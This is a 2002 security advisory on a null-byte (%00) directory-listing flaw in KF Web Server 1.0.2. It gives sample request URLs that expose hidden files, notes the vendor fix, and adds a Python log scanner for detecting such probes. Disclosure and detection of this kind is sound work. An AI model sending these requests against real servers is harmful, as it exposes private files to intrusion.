KF Web Server version 1.0.2 shows file and directory content
Overview
Discovered on July 2nd, 2002
Vendor: KeyFocus
KF Web Server 1.0.2 is a free personal web server available for Windows 98, ME, 2000 and XP. This web server can be made to show file and directory content.
Details
If the requested URL contains a %00 after a directory name, the server returns a listing of all files in that directory. An attacker can see all hidden (non-HTML-linked) files and directories on the server.
Exploit
The exploit is really easy. You can do it with any browser.
Examples:
http://server_name/index.html : Normal use.
http://server_name/%00 : Vulnerable.
http://server_name/index.html%00 : *Not* vulnerable.
http://server_name/%00index.html : Vulnerable. In fact, everything after %00 is ignored.
http://server_name/subdir/%00 : Vulnerable.

Solution
The vendor has been informed and has solved the problem.
Upgrade to KF Web Server version 1.0.3.
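
To check whether a server was probed before it was upgraded, the request forms listed under Exploit can be searched for in the access log. The following is an added example, not code from the advisory or from KeyFocus; it assumes the log is in Common Log Format, and the sample lines and the names `classify` and `scan` are constructed for illustration.

```python
import re

# Constructed sample lines in Common Log Format (an assumed format, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [02/Jul/2002:10:00:01 +0200] "GET /index.html HTTP/1.0" 200 1043
192.0.2.11 - - [02/Jul/2002:10:00:05 +0200] "GET /%00 HTTP/1.0" 200 2310
192.0.2.11 - - [02/Jul/2002:10:00:09 +0200] "GET /index.html%00 HTTP/1.0" 200 1043
192.0.2.11 - - [02/Jul/2002:10:00:12 +0200] "GET /%00index.html HTTP/1.0" 200 2310
192.0.2.12 - - [02/Jul/2002:10:00:20 +0200] "GET /subdir/%00?x=1 HTTP/1.0" 200 512
"""

# Captures client, request target and status from one Common Log Format line.
LINE_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) [^"]*" (\d{3})')


def classify(target):
    """Classify a request target by its first encoded NUL byte.

    'listing' -> %00 directly follows '/', the form the advisory reports
                 as returning the directory content
    'nul'     -> %00 elsewhere in the path (reported as not vulnerable,
                 but still worth reviewing)
    None      -> no %00 in the path
    """
    path = target.split("?", 1)[0]   # ignore the query string
    pos = path.find("%00")           # the server ignores text after the first %00
    if pos == -1:
        return None
    return "listing" if pos > 0 and path[pos - 1] == "/" else "nul"


def scan(log_text):
    """Return (client, target, status, verdict) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and (verdict := classify(m.group(2))):
            hits.append((m.group(1), m.group(2), int(m.group(3)), verdict))
    return hits


if __name__ == "__main__":
    for client, target, status, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:8} {status} {client} {target}")
```

A `listing` hit answered with status 200 on version 1.0.2 means the directory content was most likely returned to that client.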
Discovered by
Arnaud Jacques aka scrap
webmaster@securiteinfo.com

